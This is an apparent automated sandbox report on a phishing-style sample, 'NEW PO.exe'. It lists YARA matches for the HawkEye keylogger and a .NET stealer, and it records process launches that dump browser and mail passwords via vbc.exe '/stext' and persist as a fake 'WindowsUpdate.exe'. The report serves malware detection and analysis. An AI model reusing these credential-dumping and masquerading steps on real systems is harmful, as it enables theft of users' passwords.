Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.395440509.0000000008660000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000000.395401347.0000000008640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.366905535.0000000007C60000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.408411000.0000000008640000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.315132026.0000000007C60000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.315200782.0000000007EE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000012.00000000.408464737.0000000008660000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.439615340.0000000008660000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.367050092.0000000007EE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.320411963.0000000007C60000.00000004.00020000.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413F8E appears 66 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00413E2D appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00442A90 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 004141D6 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00411538 appears 35 times

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

10_2_00408836

Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs NEW PO.exe
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs NEW PO.exe
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemailpv.exe< vs NEW PO.exe
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePhulli.exe0 vs NEW PO.exe
Source: NEW PO.exe, 00000000.00000002.296655248.000000000336A000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameTaskNode.dll4 vs NEW PO.exe
Source: NEW PO.exe, 00000000.00000002.295510241.0000000000F70000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLRSurrogateEnt.exeH vs NEW PO.exe
Source: NEW PO.exe, 00000007.00000000.320473195.0000000007EE0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs NEW PO.exe
Source: NEW PO.exe, 00000007.00000000.290440235.00000000006C0000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLRSurrogateEnt.exeH vs NEW PO.exe
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs NEW PO.exe
Source: NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemailpv.exe< vs NEW PO.exe
Source: NEW PO.exe, 00000007.00000000.293949703.0000000000482000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamePhulli.exe0 vs NEW PO.exe
Source: NEW PO.exe, 00000007.00000000.316678643.0000000000DFA000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs NEW PO.exe

Source: NEW PO.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: WindowsUpdate.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: NEW PO.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NEW PO.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW PO.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@22/22@4/4

Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()

Source: NEW PO.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00411EF8 FindResourceW,SizeofResource,LoadResource,LockResource,

10_2_00411EF8

Source: C:\Users\user\Desktop\NEW PO.exe

File read: C:\Users\user\Desktop\NEW PO.exe

Jump to behavior

Source: C:\Users\user\Desktop\NEW PO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\NEW PO.exe 'C:\Users\user\Desktop\NEW PO.exe'
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Users\user\Desktop\NEW PO.exe C:\Users\user\Desktop\NEW PO.exe
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 2424
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe 'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Users\user\Desktop\NEW PO.exe C:\Users\user\Desktop\NEW PO.exe	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe C:\Users\user\AppData\Roaming\WindowsUpdate.exe
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 2412

Source: C:\Users\user\Desktop\NEW PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\NEW PO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

File created: C:\Users\user\AppData\Local\Temp\bhvF8EB.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

10_2_00415F87

Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, 0000000A.00000000.316195444.0000000000400000.00000040.00000001.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
